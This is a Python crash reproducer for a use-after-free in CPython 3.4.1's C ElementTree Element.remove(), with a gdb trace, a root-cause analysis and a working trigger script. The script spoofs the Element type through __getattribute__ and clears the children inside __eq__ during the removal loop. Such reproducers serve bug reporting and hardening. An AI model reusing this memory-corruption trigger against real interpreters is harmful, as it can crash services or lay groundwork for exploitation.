# Crash reproducer: use-after-free in the C accelerator's Element.remove()
# (Modules/_elementtree.c, element_remove), captured on a Python 3.4.1 build.
#
# Debugger session as recorded (some argument values, e.g. "op=)" and
# "args=(,)", appear truncated in the original capture):
#
#   Program received signal SIGABRT, Aborted.
#   0x40022424 in __kernel_vsyscall ()
#   (gdb) bt
#   #0  0x40022424 in __kernel_vsyscall ()
#   #1  0x400bb1df in raise () from /lib/i386-linux-gnu/libc.so.6
#   #2  0x400be825 in abort () from /lib/i386-linux-gnu/libc.so.6
#   #3  0x08067030 in Py_FatalError (
#       msg=0xbfed7a20 "/home/p/Python-3.4.1/Modules/_elementtree.c:1436 object at 0x405743ec has negative ref count -606348326")
#       at Python/pythonrun.c:2633
#   #4  0x080f1374 in _Py_NegativeRefcount (fname=0x40646100 "/home/p/Python-3.4.1/Modules/_elementtree.c", lineno=1436,
#       op=) at Objects/object.c:203
#   #5  0x4063dfa6 in element_remove (self=0x40583c34, args=(,))
#       at /home/p/Python-3.4.1/Modules/_elementtree.c:1436
#   (gdb) frame 5
#   #5  0x4063dfa6 in element_remove (self=0x40583c34, args=(,))
#       at /home/p/Python-3.4.1/Modules/_elementtree.c:1436
#   1436            Py_DECREF(self->extra->children[i]);
#   (gdb) print i
#   $1 = 1
#   (gdb) print *(PyObject*)self->extra->children
#   $3 = {_ob_next = 0x4057437c, _ob_prev = 0x405743ec, ob_refcnt = 1079461180, ob_type = 0x4057461c}
#
#   Fatal Python error: /home/p/Python-3.4.1/Modules/_elementtree.c:1436 object at 0x405743ec has negative ref count -606348326
#
# Root cause: element_remove() compares each child against the argument, which
# runs the child's user-defined __eq__. That __eq__ clears "self->extra->children"
# while the C loop is still in progress, so the Py_DECREF at line 1436 operates on
# a stale pointer. Use after free.
#
# Review notes:
#   * The abort is raised by the reference-count sanity check visible in frame #4
#     (_Py_NegativeRefcount); the _ob_next/_ob_prev fields in the dump suggest a
#     reference-tracing debug build. A build without that check would not stop
#     here, so the stale Py_DECREF would go unnoticed at this point.
#   * The general hardening for this bug class is for the C code to hold its own
#     strong reference to the child across the comparison and to re-validate the
#     children array afterwards, because any rich comparison may run arbitrary
#     Python code. The actual upstream fix is not shown on this page.
#   * On interpreters where extend() rejects non-Element items, the script is
#     expected to stop with a TypeError before remove() is reached - confirm
#     against the version under test.
import xml.etree.ElementTree as et

# Number of __eq__ calls so far; the mutation fires on the second call, which
# matches "print i" == 1 in the trace above.
cnt = 0


class X:
    def __eq__(self, o):
        global e, L, cnt
        print("__eq__")
        cnt += 1
        if cnt != 2:
            # Report "not equal" so the caller keeps scanning the children.
            return 0
        # Second comparison: drop every reference to the children, both the
        # Python list and the element's own child storage, while the caller is
        # still iterating over that storage.
        L[:] = []
        e[:] = []
        # Report "equal" so the caller proceeds to release children[i].
        return 1

    def __getattribute__(self, a):
        # Every attribute lookup on an X instance yields the Element type.
        # Presumably this makes a __class__-based instance check in extend()
        # accept X objects as elements - inferred, not shown on this page.
        probe = et.Element("h4h4")
        return type(probe)


# Children that are not real Elements but carry the custom __eq__ above.
L = [X() for _ in range(1337)]

e = et.Element("lol")
e.extend(L)

# remove() searches the children for "r", invoking X.__eq__ once per child.
r = et.Element("remove")
e.remove(r)